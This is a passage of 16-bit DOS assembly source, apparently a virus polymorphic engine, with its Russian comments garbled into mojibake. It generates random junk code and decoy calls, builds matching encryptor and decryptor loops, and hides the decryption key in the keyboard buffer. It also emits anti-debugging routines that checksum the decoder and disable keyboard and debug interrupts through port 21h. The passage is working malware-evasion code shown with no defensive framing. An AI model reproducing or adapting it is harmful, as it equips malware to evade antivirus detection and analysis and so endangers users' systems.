mov al,0ffh ; «¨ ¥é¥ ª®¬ ¤ mov ax,00xxh
call BRandom
mov ah,0b8h
xchg ah,al
call Store_Word
xor al,al
call Store_Byte
@@SKIP3:
call Random_Empty_Code
mov ax,016cdh
call Random_Store_Word ; 맮¢ int 16h
retn
; p®æ¥¤ãp £¥¥p¨â ª®¤, § ¯¨áë¢ î騩 <Register_In_Crypt> ¢ KeyBuffer:
; mov ax,05xxh
; int 16h
Generate_Write16h:
push dx
call Random_Empty_Code
mov al,byte ptr [bx+Register_In_Crypt]
or al,01011000b ; pop <Register_In_Crypt>
push ax ax
and al,11110111b ; push/push <Register_In_Crypt>
push ax
call Random_Store_Byte
pop ax
call Random_Store_Byte
mov byte ptr [bx+Second_Call],0
call Call_Kbd_Write
pop ax ; Thirst pop <Register_In_Crypt>
call Random_Store_Byte
mov byte ptr [bx+Second_Call],1
call Call_Kbd_Write
pop ax ; Second pop <Register_In_Crypt>
call Random_Store_Byte
pop dx
retn
Second_Call db ?
Call_Kbd_Write: ; ¥¥p æ¨ï ¢ë§®¢ int 16h ¤«ï § ¯¨á¨ (ah=5)
call Random_Empty_Code
call Boolean
xchg dx,ax
mov ah,byte ptr [bx+Register_In_Crypt]
shl ah,3
or ah,11000001b
mov al,89h ; mov/xchg cx,<Register_In_Crypt>
sub ax,dx
sub ax,dx
call Random_Store_Word
call Boolean
jz @@AX_CX
call Load_CX
call Load_AX
jmp @@CX_AX
@@AX_CX:
call Load_AX
call Load_CX
@@CX_AX:
mov ax,16cdh ; int 16h
call Random_Store_Word
retn
Load_CX:
cmp byte ptr [bx+Second_Call],0
jz Thirst_Call
mov al,2 ; ¨¡® xchg ch,cl, «¨¡® xchg cl,ch,
call BRandom ; «¨¡® mov cl,ch
push bx
shl ax,1
add bx,ax
mov ax,word ptr [bx+Load_Tbl1]
pop bx
call Random_Store_Word
Thirst_Call:
mov al,2 ; ¨¡® xor ch,ch, «¨¡® sub ch,ch, «¨¡®
call BRandom ; mov ch,0
push bx
shl ax,1
add bx,ax
mov ax,word ptr [bx+Load_Tbl2]
pop bx
call Random_Store_Word
retn
Load_AX:
call FullRandom ; mov ax,05xxh
mov al,0b8h
call Store_Word
mov al,5
call Random_Store_Byte
retn
Load_Tbl1 dw 0e986h,0cd86h,0e988h
Load_Tbl2 dw 0ed30h,0ed28h,00b5h
;-----------------------------------------------------------------------;
; à®æ¥¤ãà , ¨á¯®«ì§ãï â ¡«¨æã Crypt_Codes, ᮧ¤ ¥â ¨áâàãªæ¨î ;
; 室: ax=í«¥¬¥â â ¡«¨æë ¡¥§ ãç¥â bx, si=á ãç¥â®¬ bx ;
;
᫨ ¨áâàãªæ¨ï add/sub/xor, â® dl ᮤ¥à¦¨â ॣ¨áâà-ª«îç ;
; di= ¤à¥á ¯®¤ ¨áâàãªæ¨î ;
; ë室: es:di ᮤ¥à¦¨â ¨áâàãªæ¨î, di 㪠§ë¢ ¥â § ¥¥ ª®¥æ ;
;-----------------------------------------------------------------------;
Make_Instruction:
push cx dx dx
xchg dx,ax
mov al,2eh ; à¥ä¨ªá cs: - ¤«ï ª®à४⮩ à ¡®âë
stosb
lodsw
or ah,byte ptr [bx+Register_In_Dis]
cmp byte ptr [bx+Register_In_Dis],110b ;
᫨ ॣ¨áâà bp,
jne @@NORM1 ; â® ãç¨âë¢ ¥¬ ᬥ饨¥
or ah,01000000b
@@NORM1:
cmp dx,Offset Control_8
jb @@CNT1
je @@CNT2
cmp dx,Offset Control_9
jae @@CNT2
@@CNT1: ; áâàãªæ¨¨ neg/not/inc/dec/rol/ror
pop dx
stosw
jmp @@CNT3
@@CNT2: ; áâàãªæ¨¨ add/sub/xor
pop dx
or ah,dl ; «îç è¨ä஢ª¨
stosw
@@CNT3:
test ah,01000000b ; «ï ॣ¨áâà bp: ᬥ饨¥ = 0
jz @@NORM2
xor al,al
stosb
@@NORM2:
pop dx cx
retn
; 室ëå ¯ à ¬¥â஢ ¥â
Define_Increment:
call Boolean
jz Big_INC
mov al,01000000b
or al,byte ptr [bx+Register_In_Ofs]
call Store_Byte ; ¤®¡ ©â ï ª®¬ ¤ inc <reg>
jmp Exit_Define_Increment
Big_INC:
mov ax,1100000011111111b
or ah,byte ptr [bx+Register_In_Ofs]
call Store_Word ; ¢ãå¡ ©â ï ª®¬ ¤ inc <reg>
Exit_Define_Increment:
retn
;===[á®¢ë¥ ¯à®æ¥¤ãàë ¨ £®«®¢ ï ¯à®æ¥¤ãà ]============================;
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â ¥ª¨© á«ãç ©ë© ¥ § ¢¨á î騩 ª®¤, ¨á¯®«ì§ãï ;
; ¯à®æ¥¤ãàã Empty_Code ;
; 室: ah=ç¨á«® ¨áâàãªæ¨©, al=ç¨á«® ¨á¯®«ì§ã¥¬ëå â ¡«¨æ (áç¥â á 0) ;
; es:di=¡ãä¥à ¯®¤ ª®¤ ;
; ë室: di=㪠§ â¥«ì § ¯®¬¥é¥ë© ª®¤ ;
;-----------------------------------------------------------------------;
Make_Empty_Code proc near
push cx
sub cx,cx
mov cl,ah
Make_Empty_Code_Loop:
call Empty_Code
loop Make_Empty_Code_Loop
pop cx
retn
Make_Empty_Code endp
;----------------------------------------------------------------------;
; 맮¢ Make_Empty_Code_&_Calls ¤«ï ᮧ¤ ¨ï 3 ¨áâàãªæ¨© ¨ 1-£® ¢ë§®¢ ;
;----------------------------------------------------------------------;
Make_For_Cryptor proc near
push ax cx si dx
mov al,01010000b ; ®¬ ¤ push
mov cl,al
or al,byte ptr [bx+Register_In_Ofs]
or cl,byte ptr [bx+Register_In_Cyc]
mov dl,cl
push ax
call Boolean ; ª®© ॣ¨áâà ᯥࢠá®åà ïâì?
pop ax
jz @@Do_Not_Exchange
xchg cx,ax
@@Do_Not_Exchange:
call Random_Store_Byte ; ¥¥à¨¬ push <Register_In_Cyc> ¨
xchg cx,ax ; push <Register_In_Ofs> (¨«¨ ®¡®à®â)
call Random_Store_Byte
push ax cx
test byte ptr [bx+Params],00000100b
jz Dont_Generate_PUSH ; ¥p¥å®¤ ¥á«¨ ¥â ¯¥p¥¤ ç¨ ç/§ ¡ãää¥p
mov al,dl ; £¥¥p¨¬ push <Register_In_Cyc>
call Random_Store_Byte
push dx
Dont_Generate_PUSH:
mov ah,byte ptr [bx+Register_In_Ofs]
xor dx,dx ; ¡ï§ â¥«ì® ¯à¨á¢ ¨¢ ¥¬ ॣ¨áâàã ¤à¥á 樨
; ¥ªãî ª®áâ âã, â.ª. ¥£® § 票¥ ¥
call Define_Move ; ®¯à¥¤¥«¥®, ® ¨á¯®«ì§ã¥âáï ¢ ®¯¥à æ¨ïå
; á ¤à. ॣ¨áâà ¬¨, ª®¨¥ ¬®£ãâ ¡ëâì ª«îç ¬¨
mov ax,301h ; ¥¥à¨¬ 2 ¨áâàãªæ¨¨
call Make_Empty_Code
call Generate_Read16h
call Generate_Write16h
;---[¥p¥¤ ç Key Value ç¥p¥§ ª« ¢¨ âãpë© ¡ãää¥p]-----------------------;
test byte ptr [bx+Params],00000100b
jz Dont_Give_From_Buffer
pop ax ; ¥¥p¨¬ pop <Register_In_Cyc>
or al,00001000b
call Random_Store_Byte
push word ptr [bx+STC_Or_CLC2] ; ¥¥p¨¬ jnz||loop ç/§ ª®¤
mov byte ptr [bx+STC_Or_CLC2],0f9h
mov byte ptr [bx+UU],1
call Call_For_Make_For_Cryptor
mov byte ptr [bx+UU],0
pop word ptr [bx+STC_Or_CLC2]
push di di
call Random_Empty_Code
mov al,01010001b ; áâpãªæ¨ï push cx
push ax
call Random_Store_Byte
mov al,01010000b
or al,byte ptr [bx+Register_In_Crypt]
push ax
call Random_Store_Byte ; ¥¥p¨¬ push <Register_In_Crypt>
mov dl,1 ; £®ï¥¬ á«®¢® ¢ keyboard buffer
mov ah,byte ptr [bx+Register_In_Crypt]
call Entry_For_Make_Init_Routine_Proc_Call
mov ax,word ptr [bx+Key_Value]
mov word ptr [di-2],ax
call Generate_Write16h
pop ax
or al,00001000b ; ¥¥p¨¬ pop <Register_In_Crypt>
call Random_Store_Byte
pop ax
or al,00001000b ; ¥¥p¨¬ pop cx
call Random_Store_Byte
pop si ax ; si,ax= ¤p¥á jnz/loop'a + 2
sub ax,di
neg ax
dec si
push di
mov di,si ; ¥¥p¨¬ ®p¬ «ìë© jnz/loop
call Store_Byte
pop di
;---[®¥æ £¥¥p 樨 í⮣® ^^^^^^^^ ª®¤ ]--------------------------------;
Dont_Give_From_Buffer:
pop cx ax
or al,00001000b ; ª« ¤ë¢ ¥¬ ¬ áªã ¨áâàãªæ¨¨ pop
or cl,00001000b
call Random_Store_Byte ; ¥¥à¨¬ pop'ë (¢ ®¡à ⮬ ¯®à浪¥)
xchg cx,ax
call Random_Store_Byte
pop dx si cx ax
retn
Make_For_Cryptor endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà £¥¥à¨â á«ãç ©ë© ª®¤ (á¬. Make_Empty_Code) ¨ ¢ë§®¢ë £®â®¢¨â;
; ¢ ¥¬ ¢ë§®¢ë ¯à®æ¥¤ãà ;
; 室: ax=á¬. Make_Empty_Code, si=¬ ªá¨¬ «ì®¥ ç¨á«® ¢ë§®¢®¢ ;
;-----------------------------------------------------------------------;
Make_Empty_Code_&_Calls proc near
push ax si cx
xor cx,cx
mov cl,ah
MEC&C_Loop:
push ax
mov al,2
call BRandom
or al,al
jnz Skip_Creat_CALL
mov al,0e8h
call Store_Byte ; ¥à¢ë© ¡ ©â call'a
push bx
xor ax,ax
mov al,byte ptr [bx+Foreign_Calls_Count]
shl ax,1
add bx,ax
mov word ptr [bx+Foreign_Call_Table],di
inc di ; ¥§¥à¢ ¬¥áâ ¤«ï ¤ ëå call'a
inc di
pop bx
inc byte ptr [bx+Foreign_Calls_Count]
Skip_Creat_CALL:
pop ax
call Empty_Code
loop MEC&C_Loop
pop cx si ax
retn
Make_Empty_Code_&_Calls endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ᮧ¤ ¥â ¯®¤¯à®£à ¬¬ë, ª-àë¥ ¢ë§ë¢ îâáï ¢ ¤¥ªà¨¯â®à¥ ;
; 室: ax=®¬¥p ¯p®æ-pë,¢ ª-pãî ¯®¬¥áâ¨âáï ¯®¬¥å®ãáâ®©ç¨¢ë© «¨§ â®p ;
; cx=®¬¥p ⥪ã饩 ¯p®æ¥¤ãpë ;
; es:di=¡ãä¥à ¯®¤ ¯®¬¥é ¥¬ë© ª®¤ ;
; ë室: ᮧ¤ ¯à®æ¥¤ãà ¨ ¯à릮ª ç/§ ¥¥,DeCoder_Size ᪮à४â¨à®¢ ;
;-----------------------------------------------------------------------;
Make_Routine proc near
push ax cx si di
cmp ax,cx
je Make_stc ; H㦠£¥¥p æ¨ï ¯®¬¥å®ãá⮩稢®£® ª®¤ (jc)
mov byte ptr [bx+STC_Or_CLC],0f8h ; clc
jmp Make_clc
Make_stc:
mov byte ptr [bx+STC_Or_CLC],0f9h ; stc
Make_clc:
call Generate_Code ; ¡¨¢ ¥¬ ¢¥¯à®æ¥¤ã஥ ¯à®áâà á⢮
; "¬ãá®à®¬" ¨ ¢ë§®¢ ¬¨
push di
add di,3 ; ¥§¥à¢ ¬¥áâ ¤«ï ¯¥à¥å®¤ /¢ë§®¢ , jmp/call
;---[®§¤ ¨¥ ⥫ ¯à®æ¥¤ãàë]--------------------------------------------;
sub ax,ax
mov al,byte ptr [bx+Calls_Count]
shl ax,1
push bx
add bx,ax ; ®åà 塞 ¤à¥á ⥪ã饩
mov word ptr [bx+Call_Table],di ; ¯à®æ¥¤ãàë
pop bx
cmp byte ptr [bx+STC_Or_CLC],0f9h
jne @@SKIP10
mov word ptr [bx+Where_INT3_Proc],di
@@SKIP10:
mov al,8 ; ®§¤ ¥¬ 5-13 "¯ãáâëå" ¨áâàãªæ¨© ¢ ¯à®æ¥¤ãà¥
call BRandom
add al,5
xchg cx,ax
mov si,4 ; ªá¨¬ã¬ - 4 ¢ë§®¢
Repeat_MEC:
mov al,1 ; ¥¥à æ¨ï 1-© ¨áâàãªæ¨¨ ¨§ 2-å â ¡«¨æ
call Empty_Code
cmp byte ptr [bx+Calls_Count],0
jz Skip_CALL
mov al,2 ; 1 ¢ë§®¢ ¢«®¦¥®© ¯à®æ¥¤ãàë 5 ¨áâàãªæ¨©
call BRandom ; ¢ ⥪ã饩 ¯à®æ¥¤ãà¥
jnz Skip_CALL
test si,si
jz Skip_CALL
dec si
mov al,0e8h ; call
call Store_Byte
mov al,byte ptr [bx+Calls_Count]
dec ax ; ë¡¨à ¥¬ ®¤ã ¨§ 㦥 ᮧ¤ ëå ¯à®æ¥¤ãà
call BRandom ; ¢ ª ç¥á⢥ ¢«®¦¥®©
shl ax,1
push bx
add bx,ax
mov ax,word ptr [bx+Call_Table] ; ¤à¥á í⮩ ¯à®æ¥¤ãàë ¢
pop bx ; encryptor'e
sub ax,di
dec ax
dec ax
call Store_Word
Skip_CALL:
loop Repeat_MEC
STC_Or_CLC db ? ; áâpãªæ¨ï stc ¨«¨ clc
jnc Skip_Anti_INT3
call Anti_INT3 ; ®§¤ ¨¥ ¯®¬¥å®ãá⮩稢®£® â¨âp áá¨p®¢®ç-
; ®£® ª®¤
Skip_Anti_INT3:
;---[®§¤ ¨¥ ¢ë室 ¨§ ®®©]-------------------------------------------;
mov al,0c3h ; áâàãªæ¨ï retn
call Store_Byte
mov al,3 ;
᫨ ¯¥p¥å®¤ call'®¬, â® ¥ add sp,2
call BRandom ; ¢ ç «¥ ¬ãá®p :)
inc ax
mov ah,4
xchg ah,al
call Make_Empty_Code
cmp byte ptr [bx+STC_Or_CLC],0f9h ; Init-¯p®æ¥¤ãp ç¨ ¥âáï
jne Dont_Make_Init_Routine ; áp §ã § Anti_INT3-¯p®æ¥¤ãp®©
push dx
call Boolean
lea ax,[bx+Make1]
lea dx,[bx+Make2]
jz @@Skip14
xchg dx,ax
@@Skip14:
push dx
call ax
pop dx
call dx
pop dx
jmp Dont_Make_Init_Routine
;---[®§¤ ¨¥ ç «ì®© init-¯p®æ¥¤ãpë]----------------------------------;
Make1:
mov word ptr [bx+Where_Init_Proc],di
push si ; ¯p¥é ¥¬ IRQ 1,3,4 :)
call Boolean
lea si,[bx+Disable1]
lea ax,[bx+Disable2]
jz @@Skip15
xchg si,ax
@@Skip15:
call Copy
pop si
mov dl,1 ; £®ï¥¬ á«®¢® ¢ keyboard buffer
mov ah,byte ptr [bx+Register_In_Crypt]
call Entry_For_Make_Init_Routine_Proc_Call
call Generate_Write16h
mov al,0c3h ; retn
call Store_Byte
retn
Disable1 = $
nop
in al,21h
nop
or al,1ah
nop
out 21h,al
nop
db 0ffh
Disable2 = $
nop
mov dx,21h
nop
in al,dx
nop
or al,1ah
nop
out dx,al
nop
db 0ffh
;---[®§¤ ¨¥ ª®¤ ¨¨æ¨ «¨§ 樨 ¢á¥å p¥£¨áâp®¢]-------------------------;
Make2:
mov word ptr [bx+Where_Reg_Ini],di
call Make_Reg_Init
mov al,0c3h ; retn
call Store_Byte
retn
;---[®§¤ ¨¥ ¯¥à¥å®¤ ç/§ ᣥ¥à¥ãî ¯à®æ¥¤ãàã]------------------------;
Dont_Make_Init_Routine:
mov si,di ; ®åà 塞 di ¢ si
pop di ; di= ¤à¥á ç « -3 ¡ ©â ⥪ã饩 ¯à®æ¥¤ãàë
call Boolean
mov al,0e9h ; ãâà¨á¥£¬¥âë© jmp
jz @@Use_JMP
mov al,0e8h ; ãâà¨á¥£¬¥âë© call
@@Use_JMP:
call Store_Byte
push ax
mov ax,si ; ®§¤ ¥¬ ¤à¥á ¯¥à¥å®¤
sub ax,di
dec ax
dec ax
call Store_Word
pop ax
mov di,si
cmp al,11101000b ;
᫨ ¯¥à¥å®¤ ¡ë« ¢ë¯®«¥ ¨áâàãªæ¨¥© call,
jne Skip_Stack_Correct ; â® ª®à४â¨à㥬 á⥪
mov al,15 ; ¥p¥¤ í⨬ ¬ë ¥é¥ ¯¨å ¥¬ 1-16 ¨áâpãªæ¨©
call BRandom ; ¨§ ¯¥p¢ëå 2-å â ¡«¨æ
inc ax
xchg ah,al
inc ax
call Make_Empty_Code
call Boolean ; ë¡¨à ¥¬ 1 ¨§ 4-å ¢ ਠ⮢ ª®à४樨 á⥪ :
jz Direct_Correct
mov al,111b ; (ë¡¨à ¥¬ «î¡®© ॣ¨áâà)
call BRandom
xchg cx,ax
call Test_SP
mov al,01011000b ; áâàãªæ¨¥© pop
or al,cl
call Store_Byte
jmp Skip_Stack_Correct
Direct_Correct:
mov al,2
call BRandom
jz INC_SP_Twice
dec ax
mov al,83h
jz ADD_SP
call Store_Byte
mov ax,0feech ; áâàãªæ¨¥© sub sp,-2
jmp _Stack_Correct
ADD_SP: ; áâàãªæ¨¥© add sp,2
call Store_Byte
mov ax,02c4h
jmp _Stack_Correct
INC_SP_Twice: ; áâàãªæ¨ï¬¨ inc sp/inc sp
mov ax,4444h
_Stack_Correct:
call Store_Word
Skip_Stack_Correct:
inc byte ptr [bx+Calls_Count]
pop ax
sub ax,di
neg ax
add word ptr [bx+DeCoder_Size],ax
pop si cx ax
retn
;---[à®æ¥¤ãà § ¡¨¢ ¥â ¢¥¯à®æ¥¤ã஥ ¯à®áâà á⢮ "¬ãá®à®¬"]-----------;
Generate_Code:
mov si,3 ; ªá¨¬ã¬ - 3 ¢ë§®¢
mov al,2 ; ¥¥à¨¬ 4-6 "¯ãáâëå" ¨áâàãªæ¨©
call BRandom
add al,4
mov ah,al
mov al,4 ; 5 â ¡«¨æ
call Make_Empty_Code_&_Calls
retn
;---[p®æ¥¤ãp £¥¥p¨â ¯®¬¥å®ãáâ®©ç¨¢ë© (®â int 3) ª®¤]------------------;
Anti_INT3: ;
H
:
push dx
mov al,0e8h ; 맮¢ ª®¤ ç «ì®© ¨¨æ¨ «¨§ 樨
call Store_Byte ; ¢á¥å p¥£¨áâp®¢...
mov word ptr [bx+Calls_Reg_Ini+2],di
call Random_Store_Word
mov al,01010000b ; ...ª®¬ ¤ã push ¤«ï p¥£. ¤p¥á 樨...
or al,byte ptr [bx+Register_In_Ofs]
call Random_Store_Byte
mov ah,byte ptr [bx+Register_In_Ofs]
lea si,Where_INT3_Ini_Ofs
call Define_Ini_Ofs ; ...¨¨æ¨ «¨§ æ¨î p¥£¨áâp ¤p¥á 樨...
call Random_Empty_Code
call Boolean
mov ah,byte ptr [bx+Register_In_Cyc]
lea si,Where_INT3_Ini_Size
call Define_Ini_Cyc ; ...¨¨æ¨ «¨§ æ¨î áç¥â稪
mov word ptr [bx+Where_Cycle],di ; ¤p¥á § 横«¨¢ ¨ï
call Random_Empty_Code
mov al,01010000b
or al,byte ptr [bx+Register_In_Cyc]
call Store_Byte ; push <Register_In_Cyc>
call Generate_Read16h
mov cx,word ptr [bx+TLength]
Generate_Trap_Instructions:
push cx
;<><><><> £¥¥p æ¨ï ª«î祢®£® ¯®¬¥å®ãá⮩稢®£® ª®¤ <><><><>
push cx
call Random_Empty_Code
mov al,2eh
call Store_Byte ; p¥ä¨ªá cs:
mov al,_Check_Codes-Offset Check_Codes-1 ; §¬¥à â ¡«¨æë ª®¬ ¤
call BRandom
lea si,[bx+Check_Codes] ; ¤à¥á â ¡«¨æë ª®¬ ¤
add si,ax
lodsb ; ¨â ¥¬ í«¥¬¥â â ¡«¨æë
call Store_Byte ; ¥à¢ë© ¡ ©â
pop cx
push bx
add bx,cx
mov cl,byte ptr [bx+Key_Table-1]
pop bx ; ¥£¨áâp "¢" ¥ ¡ã¤¥â ᮢ¯ ¤ âì á p¥£. ¤p.
mov al,byte ptr [bx+Register_In_Dis]
cmp al,110b ; «ï p¥£¨áâp bp ¥®¡å®¤¨¬® ®¡ã«¨âì ᬥ饨¥:
jne @@NORM3 ; [bp+0]
or al,01000000b
@@NORM3:
or al,cl ; â®à®© ¡ ©â
call Store_Byte
test al,01000000b ; ¥£¨áâ¥p bp?
jz @@NORM4
xor al,al ; , ¥é¥ ãç⥬ ᬥ饨¥ 0
call Store_Byte
@@NORM4:
;<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
pop cx
loop Generate_Trap_Instructions
call Generate_Write16h
mov al,01011000b
or al,byte ptr [bx+Register_In_Cyc]
call Store_Byte ; pop <Register_In_Cyc>
mov byte ptr [bx+STC_Or_CLC2],0f9h ; stc
call Call_For_Anti_INT3 ; ¥¥p¨¬ § 横«¨¢ ¨¥
mov al,01011000b
or al,byte ptr [bx+Register_In_Ofs]
call Store_Byte ; ¥¥p¨¬ ¨áâpãªæ¨î pop
pop dx
retn
;
;Anti_INT3_Sample: ; ®â â ª ¢ë£«ï¤¨â ᣥ¥p¥ë© ¯®¬¥å®ãá⮩ç. ª®¤
; push si ; ¥£¨áâp ¤p¥á 樨 á®åp 塞 - § ¯®pâ¨âáï
; call @@Pop
; <...> ; ãá®p
;@@Pop:
; pop si
; add si,Delta ; <=[Where_INT3_Ini_Ofs]
; mov cx,Length ; <=[Where_INT3_Ini_Size]
;
;@@Rep:
; push cx ; ⮠᪠§ « çâ® cx ¥ ¡ã¤¥â ¨§¬¥ïâìáï?
; <...> ; ãá®p ¨§ 1-© â ¡«¨æë
; add/sub/adc/sbb/xor <any_reg_but_not_si>,[si]
; <...> ; ãá®p ¨§ 1-© â ¡«¨æë
; pop cx
; add si,2
; loop Rep
; pop si
; retn
;
;-----------------------------------------------------------------------;
; ¡«¨æ ª®¬ ¤, ¯®¤áç¨âë¢ îé¨å CRC ¤¥ª®¤¥p
; --- ¯¥à æ¨ï ¤ ॣ¨áâ஬ á ¨á¯®«ì§®¢ ¨¥¬ ï祥ª ¯ ¬ïâ¨:
; Þ????????Þ00 reg r/mÞ (r/m<>110)
; add/adc/sub/sbb/xor
Check_Codes db 00000011b,00010011b,00101011b,00011011b,00110011b
_Check_Codes = $
Make_Routine endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ᮧ¤ ¥â ª®¤, ¨¨æ¨ «¨§¨àãî騩 ॣ¨áâàë-ª«îç¨ (¤«ï ª®ªà¥â- ;
; ®£® ª®¥ç®£® १ã«ìâ â ) ;
; 室: es:di=¡ãä¥à ¯®¤ ¯®¬¥é ¥¬ë© ª®¤, Key_Table - ¯à®¨¨æ¨ «¨§¨à®¢ ;
; ë室: di=㪠§ â¥«ì § ᣥ¥à¨à. ª®¤ ;
;-----------------------------------------------------------------------;
Make_Reg_Init proc near
push cx dx
mov byte ptr [bx+UnUsed],00010000b ; sp ¥ ¨¨æ¨ «¨§¨à®¢ âì
mov al,6 ; ª®© ¯® áç¥âã ¨áâàãªæ¨¥© ¢¯¨åãâì
call BRandom ; ®¡ã«¥¨¥?
xchg dx,ax
Already_Init:
cmp byte ptr [bx+UnUsed],0ffh ; ¨æ¨ «¨§¨à㥬 ¢á¥ ॣ¨áâàë
je Init_OK ; (ªà®¬¥ ax ¨ sp) ¢ ¯à®¨§¢®«ì-
mov al,111b ; ®¬ ¯®à浪¥
call BRandom
mov cl,1
xchg cx,ax
mov ah,cl
shl al,cl
test byte ptr [bx+UnUsed],al
jnz Already_Init
or byte ptr [bx+UnUsed],al
call Define_Move
dec dx
call Random_Empty_Code
jmp Already_Init
Init_OK:
pop dx cx
retn
Make_Reg_Init endp
;-----------------------------------------------------------------------;
; p®æ¥¤ãp ᮧ¤ ¥â ¬ãá®p á ¢ë§®¢ ¬¨ (¯®á«¥ ¨¨æ¨ «¨§ 樨 ¢á¥å p¥£) ;
;-----------------------------------------------------------------------;
Make_Rubbish proc near
push cx si di
call Generate_Code
mov al,0e8h ; 맮¢ ¨¨æ¨ «¨§ 樨 p¥£.
call Store_Byte
mov word ptr [bx+Calls_Reg_Ini],di
call Store_Word
mov si,3 ; ® 3 ¢ë§®¢®¢
mov al,5
call BRandom
add al,3 ; 5-7 ®áâ «ìëå ¨áâàãªæ¨©
xchg ah,al
inc ax
call Make_Empty_Code_&_Calls
pop ax
sub ax,di
neg ax
add word ptr [bx+DeCoder_Size],ax
pop si cx
retn
Make_Rubbish endp
;-----------------------------------------------------------------------;
; à®æ¥¤ãà ᮧ¤ ¥â ¤¥ª®¤¨àãîéãî ç áâì à áè¨ä஢騪 ;
; 室: es:di= ¤à¥á ᮧ¤ ¢ ¥¬®£® ª®¤ ;
; ë室: DeCoder_Size - ᪮à४â¨à®¢ , di=§ ª®¥æ decoder'a ;
;-----------------------------------------------------------------------;
Make_Crypt_Code proc near
push dx si di
mov byte ptr [bx+STC_Or_CLC2],0f8h ; clc
;---[®¬ ¤ë ¨¨æ¨ «¨§ 樨 ॣ¨áâà 横« ¨ ¤à¥á 樨]-------------------;
;---[¤¥áì ¦¥ ¢ë§®¢ ¯®¬¥å®§ é¨é¥®£® ª®¤ ]------------------------------;
mov ah,byte ptr [bx+Register_In_Ofs]
lea si,Where_Ini_Ofs
call Define_Ini_Ofs_1
call Boolean ; ZF=0/1=mov/lea
mov ah,byte ptr [bx+Register_In_Cyc]
lea si,UnUsed
call Define_Ini_Cyc
;---[®¬ ¤ë à áè¨ä஢ª¨ ¤ ëå]-----------------------------------------;
mov word ptr [bx+Where_Cycle],di
mov cx,word ptr [bx+TLength]
cmp byte ptr [bx+For_Cryptor],1
je Repeat_Build_Crypt_Code
call Make_For_Cryptor ; ¥¤à塞 ¢ë§®¢ ¯à®æ¥¤ãà ;)
Repeat_Build_Crypt_Code:
xor ax,ax
push bx
add bx,cx ; «¥¬¥âë â ¡«¨æë Method_Table ç¨â ¥¬:
mov al,byte ptr [bx+Method_Table-1] ; ¤«ï encoder'a - á ª®æ
mov dl,byte ptr [bx+Key_Table-1]
pop bx
cmp al,2
jb @@ADDR1
cmp al,6
jb @@ADDR2
cmp al,10
je @@ADDR1
sub al,4 ; ë¡¨à ¥¬ ᨬ¬¥âà¨çë¥ ¨áâàãªæ¨¨ ¤«ï decoder'a
jmp @@ADDR1 ; ¨ encoder'a: (rol-ror/inc-dec/add-sub/not-not/neg-neg/
; xor-xor)
@@ADDR2:
add al,4
@@ADDR1:
shl al,1
lea si,[bx+Crypt_Codes]
add si,ax
add ax,Offset Crypt_Codes
push di
add di,Where_Encryptor
call Make_Instruction ; ¥¥à¨¬ ¨áâàãªæ¨î ¤«ï encoder'a
pop di
xor ax,ax
push bx
add bx,word ptr [bx+TLength]
sub bx,cx
mov al,byte ptr [bx+Method_Table] ; ¤«ï decoder'a - á ç «
mov dl,byte ptr [bx+Key_Table]
shl al,1
pop bx
lea si,[bx+Crypt_Codes]
add si,ax
add ax,Offset Crypt_Codes
call Make_Instruction ; ¥¥à¨¬ ¨áâàãªæ¨î ¤«ï decoder'a
call Random_Empty_Code
loop Repeat_Build_Crypt_Code
;---[®¬ ¤ë ¨ªà¥¬¥â 樨]----------------------------------------------;
Call_For_Anti_INT3: ; â ç áâì ª®¤ ¢ë§ë¢ ¥âáï ¨§ ¯p®æ¥¤ãpë
; Anti_INT3
call Random_Empty_Code
mov al,2 ; ë¡¨à ¥¬ ⨯ ¨ªà¥¬¥â 樨: 0=inc/inc,
call BRandom ; 1=sub,2=add
jz Used_INC
dec ax
jz Used_SUB
call Boolean ; ë¡¨à ¥¬ ¬/ã ¨áâàãªæ¨¥© add, ®¯¥à. á® á«®¢ ¬¨
jz Big_ADD ; ¨ ¨áâàãªæ¨¥©, ®¯¥à¨àãî饩 á® § ª®¢. ¡ ©â ¬¨
mov ax,1100000010000011b ; 1-¥ á«®¢® ¬ «¥ìª®£® (3-å ¡ ©â®£®)
or ah,byte ptr [bx+Register_In_Ofs] ; add <reg>,2
call Store_Word
mov al,2
call Store_Byte ; ®á«¥¤¨© ¡ ©â
jmp Used_ADD
Big_ADD:
mov ax,1100000010000001b ; 1-¥ á«®¢® ¡®«ì讣® (4-å ¡ ©â®£®)
or ah,byte ptr [bx+Register_In_Ofs] ; add <reg>,2
call Store_Word
mov ax,2
call Store_Word ; ®á«¥¤¥¥ á«®¢®
jmp Used_ADD
Used_SUB:
mov ax,1110100010000001b ; ¥à¢®¥ á«®¢® 4-å ¡ ©â®£®
or ah,byte ptr [bx+Register_In_Ofs] ; sub <reg>,0fffeh
call Store_Word
mov ax,0fffeh ; ®á«¥¤¥¥ á«®¢®
call Store_Word
jmp Used_ADD
Used_INC:
call Define_Increment
call Define_Increment
Used_ADD:
cmp byte ptr [bx+For_Cryptor],1
jne @@SKIP6
cmp byte ptr [bx+STC_Or_CLC2],0f9h
je @@SKIP6
call Make_For_Cryptor
@@SKIP6:
call Random_Empty_Code
;---[®¬ ¤ë § 横«¨¢ ¨ï]-----------------------------------------------;
Call_For_Make_For_Cryptor:
cmp byte ptr [bx+Register_In_Cyc],1 ; ¥£¨áâà cx?
jne Register_Not_CX ; ¥â
call Boolean ; ᯮ«ì§®¢ âì loop ¤«ï cx?
jz Register_Not_CX ; ¥â
mov al,11100010b ; ¥à¢ë© ¡ ©â - ¨áâàãªæ¨ï loop
jmp Store_Disp
Register_Not_CX:
cmp byte ptr [bx+Register_In_Cyc],0 ; ¥£¨áâà ax?
jne Register_Not_AX ; ¥â
call Boolean ; ᯮ«ì§®¢ âì ᯥæ. ®¯ª®¤ sub ax,1?
jz Register_Not_AX ; ¥â
call Boolean
jz Used_ADD_AX
mov al,00101101b ; sub ax,1
call Store_Byte
mov al,1 ; ¯®ª®©®! ¤¥áì ah=0
call Store_Word
jmp Store_JNZ
Used_ADD_AX: ; add ax,0ffffh
mov ax,1111111100000101b
call Store_Word
mov al,11111111b
call Store_Byte
jmp Store_JNZ
Register_Not_AX:
mov al,2
call BRandom ;
᫨ ¥ AX, â® ¨á¯®«ì§®¢ âì ®¡ëçë©
jz Used_INC_2 ; sub ¨«¨ ®¡ëçë© add ¨«¨ ¤¢ ⨯ dec
dec al
